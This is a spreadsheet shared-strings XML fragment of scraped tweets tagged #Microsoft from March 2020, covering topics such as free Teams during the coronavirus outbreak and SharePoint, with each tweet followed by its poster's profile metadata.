  <si>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23:35:20 +0000 2020</t>
  </si>
  <si>
    <t>How to Get #Free #ConferencingTools From #Google and #Microsoft for the Next Few Months https://t.co/hlRyVjz0UM</t>
  </si>
  <si>
    <t>{'id': 814233, 'id_str': '814233', 'name': 'Revolutionary', 'screen_name': 'revo', 'location': '127.0.0.1', 'description': '#á’ªOá¯Æ Æ¬O #á’ªÆ–á¯Æ Oá‘Ž Æ¬â„ŽÆ #á‘•á‘ŒÆ¬Æ¬Æ–á‘ŽGÆá—ªGÆ #á‘•Oá—°á‘­á‘ŒÆ¬Æá–‡ #Æ¬Æá‘•â„Žá‘ŽOá’ªOGÆ³ #á”•Æá‘•á‘Œá–‡Æ–Æ¬Æ³ #Æ–á‘ŽFOá”•Æá‘•. á—©á’ªá’ª Oá‘­Æ¬Æ–Oá‘Žá”• á—©á–‡Æ á—°Æ³ Oá—¯á‘Ž.', 'url': 'https://t.co/8jeuc7L95o', 'entities': {'url': {'urls': [{'url': 'https://t.co/8jeuc7L95o', 'expanded_url': 'https://Twitter.com/revo', 'display_url': 'Twitter.com/revo', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 172, 'friends_count': 1431, 'listed_count': 66, 'created_at': 'Tue Mar 06 05:53:33 +0000 2007', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4191,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'http://pbs.twimg.com/profile_images/52434199/17873_normal.gif', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/52434199/17873_normal.gif', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/814233/1565231096', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E0FF92', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 23:30:58 +0000 2020</t>
  </si>
  <si>
    <t>Get ready to take down enemies with a vast array of weaponry and see cool graphics in Call of Duty Modern Warfare 3 https://t.co/TNzwpdFp2B #microsoft #xbox #xbox360 #gaming #fps https://t.co/zvEJok97Qc</t>
  </si>
  <si>
    <t>Thu Mar 05 23:28:15 +0000 2020</t>
  </si>
  <si>
    <t>Ethereum Will Take Over Enterprise w/ 3 Altcoins! Who? When?
Enterprise Ethereum just got a major boost with the launch of the Baseline protocol from Consensys!! Collaborating on this pro...
#enterprise #ethereum #microsoft #protocol
https://t.co/HF4ZWA9VdM https://t.co/EDHK3auMwA</t>
  </si>
  <si>
    <t>{'id': 803159947538206720, 'id_str': '803159947538206720', 'name': 'CryptoNews v2.4', 'screen_name': '__CryptoNews', 'location': '', 'description': 'Feeding you the finest, algorithmically curated, bitcoin and crypto news content on planet Earth. 1,000+ sources of intelligently curated crypto 24/7. ðŸ”¥', 'url': 'https://t.co/H3IqMNbM3k', 'entities': {'url': {'urls': [{'url': 'https://t.co/H3IqMNbM3k', 'expanded_url': 'https://cryptotwitter.com', 'display_url': 'cryptotwitter.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10225, 'friends_count': 0, 'listed_count': 12, 'created_at': 'Mon Nov 28 08:53:48 +0000 2016', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 22539,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'http://pbs.twimg.com/profile_images/1206010757709795329/Blvz0q6Y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206010757709795329/Blvz0q6Y_normal.jpg', 'profile_link_color': 'AEB8C1',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</si>
  <si>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23:24:54 +0000 2020</t>
  </si>
  <si>
    <t>@BenjaminNorton @312shelly3 Of course it did. #microsoft #fraud #campaigntech</t>
  </si>
  <si>
    <t>{'id': 246458114, 'id_str': '246458114', 'name': 'Harry Haslam (Not My Gov). Human(endangered)', 'screen_name': 'TheHarryHaz', 'location': 'The stunning Welsh countryside', 'description': 'Owner of @midwalesdecks &amp; H.P.S. Building. Butcher of wood. Socialist. BSc(hons),LP member. #LFC forever, YNWA!!!', 'url': 'https://t.co/Z5xGm12l9D', 'entities': {'url': {'urls': [{'url': 'https://t.co/Z5xGm12l9D', 'expanded_url': 'http://www.midwalesdecks.com', 'display_url': 'midwalesdecks.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5978, 'friends_count': 6064, 'listed_count': 4, 'created_at': 'Wed Feb 02 20:41:01 +0000 2011', 'favourites_count': 52890, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18847,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'http://pbs.twimg.com/profile_images/1195707316793946118/18GZf-Ei_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195707316793946118/18GZf-Ei_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/246458114/1377289493',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</si>
  <si>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23:23:49 +0000 2020</t>
  </si>
  <si>
    <t>"Conker's Good Birthday" by SpongicX https://t.co/K1dU7AoZEO
19 years later, and I'm still waiting on that damn sequel...
#Conker #Rareware #N64 #Nintendo #Microsoft #Xbox #Berri #funny</t>
  </si>
  <si>
    <t>{'id': 212019347, 'id_str': '212019347', 'name': 'SpongicX', 'screen_name': 'SpongicX', 'location': 'Iowa', 'description': 'Official Twitter Page for â€œKnick, Clunk, and Treelaâ€, a series concept by Clint Welding Deviantart Page - https://t.co/06IaiGjdsj', 'url': 'https://t.co/wm3FnracJ5', 'entities': {'url': {'urls': [{'url': 'https://t.co/wm3FnracJ5', 'expanded_url': 'https://www.youtube.com/playlist?list=PLeAw5TFzb_caRflhMHaPyzNf4lpZXQGo5', 'display_url': 'youtube.com/playlist?list=â€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/06IaiGjdsj', 'expanded_url': 'https://spongicx.deviantart.com/gallery', 'display_url': 'spongicx.deviantart.com/gallery', 'indices': [106, 129]}]}}, 'protected': False, 'followers_count': 45, 'friends_count': 95, 'listed_count': 0, 'created_at': 'Thu Nov 04 22:34:28 +0000 2010', 'favourites_count': 11491, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5033,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'http://pbs.twimg.com/profile_images/1219932563059421191/yJD-A_fI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219932563059421191/yJD-A_fI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/212019347/1579689504',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</si>
  <si>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23:17:56 +0000 2020</t>
  </si>
  <si>
    <t>MCSA, MCSD, MCSE certifications retire The company I work with uses @Microsoft technology but not #Azure they have no interest in azure. After years as an #MCP, this is just pushing me away entirely from certifications with #Microsoft.  https://t.co/3IxYe086Ej via @MSLearning</t>
  </si>
  <si>
    <t>Thu Mar 05 23:17:11 +0000 2020</t>
  </si>
  <si>
    <t>Coronavirus fears are overplayed on #Microsoft, a company that's primarily software...
https://t.co/0JAhAjrjZJ $MSFT
&amp;gt; Diversity of offerings across #technology
&amp;gt; Strong balance sheet
&amp;gt; Recurring revenues galore
&amp;gt; The future is in the Clouds
#dividend #tech #stocks #investing</t>
  </si>
  <si>
    <t>{'id': 3244415634, 'id_str': '3244415634', 'name': 'Demi Hobbit', 'screen_name': 'BrianDColwell', 'location': 'Middle-earth', 'description': 'Guerilla Marketer, Bitcoin Numismatist, Blockchain Archaeologist, Fintech Fan, History Warlord, Cannabis Maximalist, Gamer, Comic Nerd, 4IR Stoic, Pool Partier', 'url': 'https://t.co/BjbygplXaS', 'entities': {'url': {'urls': [{'url': 'https://t.co/BjbygplXaS', 'expanded_url': 'http://briandcolwell.com/', 'display_url': 'briandcolwell.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 20836, 'friends_count': 100, 'listed_count': 4376, 'created_at': 'Sat Jun 13 18:47:51 +0000 2015', 'favourites_count': 74463, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 163691, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFF9EE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1013131290017558528/2ZL3ON4I_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1013131290017558528/2ZL3ON4I_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3244415634/1530384270', 'profile_link_color': '71AB30',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</si>
  <si>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23:15:01 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #SharePoint migrations can be complex.  Our guide walks you through when to consider a migration, scenarios and approaches.  Learn more today! https://t.co/SufewyzpNZ
#microsoft #sharepointonline #office365 #microsoft365 https://t.co/4x4FbbWzsw</t>
  </si>
  <si>
    <t>{'id': 80400398, 'id_str': '80400398', 'name': 'IncWorx Consulting', 'screen_name': 'incworx', 'location': 'Chicago, IL', 'description': 'We set the bar when it comes to providing professional consulting &amp; support services for SharePoint, Office 365, Azure &amp; other Microsoft technologies.', 'url': 'https://t.co/H1v95ONlqL', 'entities': {'url': {'urls': [{'url': 'https://t.co/H1v95ONlqL', 'expanded_url': 'http://www.incworx.com', 'display_url': 'incworx.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 623, 'friends_count': 1830, 'listed_count': 48, 'created_at': 'Tue Oct 06 20:54:04 +0000 2009', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2042,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'http://pbs.twimg.com/profile_images/1027591765019131905/MOG4fTF1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1027591765019131905/MOG4fTF1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/80400398/1533831886', 'profile_link_color': '06C4A0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DEECF2', 'profile_text_color': '555655', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 23:14:44 +0000 2020</t>
  </si>
  <si>
    <t>New nude photos on my website #Tallahassee   #lgbt #microsoft https://t.co/fR7t9qiuUa</t>
  </si>
  <si>
    <t>{'id': 1235622619036213250, 'id_str': '1235622619036213250', 'name': 'Nikki Campos', 'screen_name': 'heartsubseorai', 'location': 'Phoenix, USA', 'description': 'I will love you until the stars go out, and the tides no longer turn.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 12, 'listed_count': 0, 'created_at': 'Thu Mar 05 17:46:45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'http://pbs.twimg.com/profile_images/1235627823123005440/cnZJNWwF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235627823123005440/cnZJNWwF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235622619036213250/1583431658',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</si>
  <si>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23:10:56 +0000 2020</t>
  </si>
  <si>
    <t>#SharePoint Online Down for anyone else? #SPO #Microsoft</t>
  </si>
  <si>
    <t>{'id': 14401459, 'id_str': '14401459', 'name': 'Blake Olson', 'screen_name': 'blakeolson', 'location': 'Grand Junction, CO', 'description': 'Husband, Father, Technology Enthusiast, SharePoint Administrator from Minnesota living in Colorado.', 'url': 'https://t.co/bKTC1WDHQN', 'entities': {'url': {'urls': [{'url': 'https://t.co/bKTC1WDHQN', 'expanded_url': 'http://about.me/blakeolson', 'display_url': 'about.me/blakeolson', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 249, 'friends_count': 673, 'listed_count': 10, 'created_at': 'Tue Apr 15 21:43:56 +0000 2008', 'favourites_count': 233, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 717,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'http://pbs.twimg.com/profile_images/609361164544294912/E4QRM3v8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/609361164544294912/E4QRM3v8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14401459/1490109008', 'profile_link_color': '2FC2EF',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</si>
  <si>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23:09:58 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Teams offers free premium version due to #coronavirus  
#Microsoft is making #MicrosoftTeams premium available to all for free for six months to help people connect with their companies, schools, and colleges using the Internet.
https://t.co/cgrKgZNkXP</t>
  </si>
  <si>
    <t>{'id': 376505266, 'id_str': '376505266', 'name': 'Rapid John', 'screen_name': 'rapidjohn', 'location': 'United Kingdom', 'description': 'Media Relations Manager Rapid Mobile \nhttps://t.co/dBvUhuDfFo', 'url': 'https://t.co/EpiWxaa6pC', 'entities': {'url': {'urls': [{'url': 'https://t.co/EpiWxaa6pC', 'expanded_url': 'https://rapidmobile.biz', 'display_url': 'rapidmobile.biz', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/dBvUhuDfFo', 'expanded_url': 'https://t.me/rapidmob', 'display_url': 't.me/rapidmob', 'indices': [38, 61]}]}}, 'protected': False, 'followers_count': 4622, 'friends_count': 213, 'listed_count': 138, 'created_at': 'Tue Sep 20 00:41:19 +0000 2011', 'favourites_count': 44, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8449,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'http://pbs.twimg.com/profile_images/682997197466632192/_kkW7ywG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/682997197466632192/_kkW7ywG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/376505266/1441237705', 'profile_link_color': '3B94D9',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</si>
  <si>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23:06:11 +0000 2020</t>
  </si>
  <si>
    <t>Google, Facebook, Microsoft, Twitter &amp;amp; others have agreed to adopt 11 voluntary principles to prevent online child sexual exploitation, government officials said Thursday. 
https://t.co/l3yh4oifr5
#Google #Facebook #Microsoft #Twitter #snap and Roblox</t>
  </si>
  <si>
    <t>{'id': 2464295666, 'id_str': '2464295666', 'name': 'SearchLock', 'screen_name': 'SearchLock', 'location': '1050 Queen St. Ste. 100 09681 Honolulu, Hawaii', 'description': 'SearchLock is a privacy-friendly search engine that prevents the tracking of your personal searches by the big search engine companies and others.', 'url': 'https://t.co/UNxAUzlEp7', 'entities': {'url': {'urls': [{'url': 'https://t.co/UNxAUzlEp7', 'expanded_url': 'https://www.searchlock.com/', 'display_url': 'searchlock.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 353, 'friends_count': 210, 'listed_count': 5, 'created_at': 'Sat Apr 26 08:15:37 +0000 2014', 'favourites_count': 147, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3076,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'http://pbs.twimg.com/profile_images/856324676359905280/QgVetLy0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/856324676359905280/QgVetLy0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2464295666/1582094111',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</si>
  <si>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23:03:14 +0000 2020</t>
  </si>
  <si>
    <t>Deploy a Desktop Background Wallpaper using Group Policy (GPO) to all ma... https://t.co/HlZZwUDCe8 via @YouTube #Microsoft #Windows #WindowsServer #WindowsServer2019 #Background #Wallpaper #GroupPolicy #GPO #IT #Tech #Technology</t>
  </si>
  <si>
    <t>Thu Mar 05 23:01:44 +0000 2020</t>
  </si>
  <si>
    <t>Out-of-the-box business process automation is making a huge difference for customers. Watch how #MSDyn365BC puts your customers in the limelightwhere they belong! Watch now:     #Microsoft #Technology #IT #BusinessAutomation https://t.co/Sd3D0pumX9</t>
  </si>
  <si>
    <t>{'id': 4303689255, 'id_str': '4303689255', 'name': 'Harris Schneiderman', 'screen_name': 'harris_tweets17', 'location': 'Bellevue, Washington, USA', 'description': '', 'url': 'https://t.co/88ThKGhYji', 'entities': {'url': {'urls': [{'url': 'https://t.co/88ThKGhYji', 'expanded_url': 'https://htechsolutions.biz', 'display_url': 'htechsolutions.biz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 68, 'listed_count': 0, 'created_at': 'Sat Nov 28 05:12:49 +0000 2015', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 659,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'http://pbs.twimg.com/profile_images/865331505416904704/pDzPUn4s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/865331505416904704/pDzPUn4s_normal.jpg', 'profile_link_color': '009999',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</si>
  <si>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23:00:49 +0000 2020</t>
  </si>
  <si>
    <t>The #startup OpenAIs goal is to build technology to imitate the human brain - "weather the startup will ever create #technology to imitate the human brain is unclear. They do have $1 billion to make a go at it." #AI #Microsoft @techsocialnet
https://t.co/jXdk0SBHl3</t>
  </si>
  <si>
    <t>{'id': 807891327904055296, 'id_str': '807891327904055296', 'name': 'Luciano Vignola', 'screen_name': 'Luciano02722860', 'location': 'Dublin City, Ireland', 'description': 'Corporate Finance Specialist with 3+ years experience in Project Management, Research and Product Development.\nPassionate about Technology, BI, AI, ML and IoT.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 60, 'friends_count': 465, 'listed_count': 0, 'created_at': 'Sun Dec 11 10:14:37 +0000 2016', 'favourites_count': 276, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 81, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234601325020745728/HmGXEzyu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234601325020745728/HmGXEzyu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/807891327904055296/1579776042',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</si>
  <si>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23:00:06 +0000 2020</t>
  </si>
  <si>
    <t>List of #acquisitions by #Microsoft  a #data journey
https://t.co/KF5EU5vlCA https://t.co/a6RdwA6f0X</t>
  </si>
  <si>
    <t>{'id': 14351460, 'id_str': '14351460', 'name': 'InfoCaptor', 'screen_name': 'infocaptor', 'location': 'Pittsburgh,PA', 'description': 'Reports and dashboards for Wordpress [data visualization]\n[https://t.co/5UtZbXZfb1]  #woocommerce #DataWarehouse #dashboards #Google #analytics  #dataviz #wordpress', 'url': 'http://t.co/H2f0POEqlA', 'entities': {'url': {'urls': [{'url': 'http://t.co/H2f0POEqlA', 'expanded_url': 'http://www.infocaptor.com', 'display_url': 'infocaptor.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/5UtZbXZfb1', 'expanded_url': 'http://infocaptor.com', 'display_url': 'infocaptor.com', 'indices': [59, 82]}]}}, 'protected': False, 'followers_count': 13068, 'friends_count': 12256, 'listed_count': 310, 'created_at': 'Thu Apr 10 14:21:12 +0000 2008', 'favourites_count': 219, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18255,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'http://pbs.twimg.com/profile_images/521683172128346113/dOR5xQ-J_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/521683172128346113/dOR5xQ-J_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14351460/1440714047', 'profile_link_color': 'FA743E',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</si>
  <si>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23:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Here's how we upgraded from #Skype for Business to #MicrosoftTeams at Microsoft.  #Teams #Microsoft365 #Microsoft https://t.co/n7JGr6ER5E</t>
  </si>
  <si>
    <t>Thu Mar 05 23:00:01 +0000 2020</t>
  </si>
  <si>
    <t>#ITechskills #Academy provides #Microsoft #excel #training, #excel #intermediate #crash #course in #Mississauga, Ontario.
we offer excel #advanced #course #classes from excel #basic #training to #advance #level.
Please write your answer in comment box !!
Follow Us and ENJOY! https://t.co/l2hEgdEV7E</t>
  </si>
  <si>
    <t>{'id': 1151131337987899392, 'id_str': '1151131337987899392', 'name': 'ITech Skills', 'screen_name': 'ItechSkills', 'location': '', 'description': 'ITechSkills is a non-profit Org. that assists individuals to enhance their knowledge of Information Technology (IT)', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 2, 'listed_count': 0, 'created_at': 'Tue Jul 16 14:07:52 +0000 2019', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 59, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1151131589046239234/BWsAl43R_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151131589046239234/BWsAl43R_normal.jpg',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</si>
  <si>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22:58:38 +0000 2020</t>
  </si>
  <si>
    <t>How to Change the Default Lock Screen Image using GPO | Windows Server 2019 https://t.co/YmOyEjlNmV via @YouTube #Windows #Microsoft #WindowsServer2019 #WindowsAdmin #SystemAdmin #GPO #GroupPolicy #IT #Tech #Technology</t>
  </si>
  <si>
    <t>Thu Mar 05 22:56:45 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft Microsoft 
What if we could talk to ? That's exactly the question Project  explores.
Thank you very much 
#Microsoft #</t>
  </si>
  <si>
    <t>{'id': 2539035872, 'id_str': '2539035872', 'name': 'Future Miracle æœªã‚‰æ¥ã‚‹ï¼ˆé›†å›£ã‚¹ãƒˆãƒ¼ã‚«ãƒ¼çŠ¯ç½ªã®è§£æ±ºäººï¼‰', 'screen_name': 'miraioritekita', 'location': '', 'description': "ã€å…¬å¼ã€‘çš†ã•ã‚“ä¸€ç·’ã«ä¸–ç•Œã‚’å¤‰ãˆã¾ã›ã‚“ã‹ï¼ ã€officialã€‘Let's change the world together! #ãƒ†ã‚¯ãƒŽãƒ­ã‚¸ãƒ¼çŠ¯ç½ª #GangStalking #ElectronicHarassment", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1115, 'friends_count': 781, 'listed_count': 190, 'created_at': 'Sun Jun 01 07:51:28 +0000 2014', 'favourites_count': 115262, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 77899,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'http://pbs.twimg.com/profile_images/1118092287068622848/NikQNisY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118092287068622848/NikQNisY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2539035872/1427863709',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</si>
  <si>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22:54:43 +0000 2020</t>
  </si>
  <si>
    <t>repost MSFTDynamics365RT MSPowerAutomate: #Microsoft goes all-in on RPA. Read via Forbes: https://t.co/ymxNhiYPmV</t>
  </si>
  <si>
    <t>{'id': 891020459504013314, 'id_str': '891020459504013314', 'name': 'PixelZebraSolutions', 'screen_name': 'PZ_Solutions', 'location': 'Zuid-Holland, Nederland', 'description': 'Service innovators, NAV, dynamics 365, office 365 digital transformation, CRM', 'url': 'https://t.co/c0jfqhEFv7', 'entities': {'url': {'urls': [{'url': 'https://t.co/c0jfqhEFv7', 'expanded_url': 'http://www.pixelzebrasolutions.nl', 'display_url': 'pixelzebrasolutions.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 302, 'friends_count': 789, 'listed_count': 7, 'created_at': 'Fri Jul 28 19:40:06 +0000 2017', 'favourites_count': 1937, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7021, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/891021203258974208/wa0qNHuR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/891021203258974208/wa0qNHuR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/891020459504013314/1551122279',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</si>
  <si>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22:54:17 +0000 2020</t>
  </si>
  <si>
    <t>Free #Microsoft #Teams to enable people to effectively #collaborate and stay #connected - empowering #organisations to do more with less, while maintaining #productivity, throughout this global crisis.
#MSFTAdvocate https://t.co/v6BzNPEmp7</t>
  </si>
  <si>
    <t>{'id': 1679392046, 'id_str': '1679392046', 'name': 'Rebecka Isaksson', 'screen_name': 'RebIsa_Sthlm', 'location': 'Stockholm, Sweden', 'description': 'Change leader, influencer, blogger and mentor. Active Duathlete. Avid (shark) diver. Opinions expressed here are my own...', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 257, 'friends_count': 587, 'listed_count': 58, 'created_at': 'Sat Aug 17 23:44:41 +0000 2013', 'favourites_count': 372, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1779,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'http://pbs.twimg.com/profile_images/1198241581935079427/fUEH6r1B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1198241581935079427/fUEH6r1B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1679392046/1574518031',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</si>
  <si>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22:53:47 +0000 2020</t>
  </si>
  <si>
    <t>It still sucks the big G in droves for Office 365 #Microsoft #cloud</t>
  </si>
  <si>
    <t>{'id': 2878943566, 'id_str': '2878943566', 'name': 'memes coldacid posts', 'screen_name': 'coldacid_ebooks', 'location': 'INTERBUTTS', 'description': 'Scrambled bits and pieces of the @coldacid / @ChrisCharabaruk collection', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 104, 'friends_count': 27, 'listed_count': 73, 'created_at': 'Sun Nov 16 01:31:29 +0000 2014', 'favourites_count': 361, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 67039,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'http://pbs.twimg.com/profile_images/533796224357249024/bh3Mlqtl_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/533796224357249024/bh3Mlqtl_normal.png',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</si>
  <si>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22:52:05 +0000 2020</t>
  </si>
  <si>
    <t>#Cisco and #Microsoft partner on #cloud #IoT stuff. https://t.co/RSa8al48O2</t>
  </si>
  <si>
    <t>{'id': 130704747, 'id_str': '130704747', 'name': 'Collins Rex', 'screen_name': 'QueenRex', 'location': 'Melbourne, Australia', 'description': 'Project wrangler &amp; business mentor. Owner of ideas generator, Rex Ideas. Innovation &amp; better business advocate. AI tragic! Agtech &amp; cybersecurity enthusiast.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 449, 'friends_count': 356, 'listed_count': 264, 'created_at': 'Thu Apr 08 02:11:19 +0000 2010', 'favourites_count': 1931, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9369,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'http://pbs.twimg.com/profile_images/1212486987644469248/_QeMyRIg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212486987644469248/_QeMyRIg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/130704747/1581980747',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</si>
  <si>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22:50:17 +0000 2020</t>
  </si>
  <si>
    <t>#Amazon, #Microsoft and #Facebook urged their workers to work from home due to #coronavirus worries. https://t.co/hJAYauMebG</t>
  </si>
  <si>
    <t>{'id': 726768601601052672, 'id_str': '726768601601052672', 'name': 'The World News Journal', 'screen_name': 'wnewsjournal', 'location': 'All Around The World', 'description': 'International news for everyone in English. We are here for you to follow, learn and live the world. Now more #energetic #powerful but still #your news', 'url': 'https://t.co/hMoyaXnIpW', 'entities': {'url': {'urls': [{'url': 'https://t.co/hMoyaXnIpW', 'expanded_url': 'https://wnewsjournal.wordpress.com/', 'display_url': 'wnewsjournal.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 129, 'friends_count': 7, 'listed_count': 2, 'created_at': 'Sun May 01 13:41:52 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1627,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'http://pbs.twimg.com/profile_images/1184215085130158080/xCc9CRUJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1184215085130158080/xCc9CRUJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/726768601601052672/1571175160',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</si>
  <si>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22:46:57 +0000 2020</t>
  </si>
  <si>
    <t>#DigitalTransformation is not about using digital technologies because it only tells half the story.
Driving Transformation at #Microsoft through Reinventing the Sales Organization
https://t.co/7o70SG39Wt https://t.co/pdtpFQKJ28</t>
  </si>
  <si>
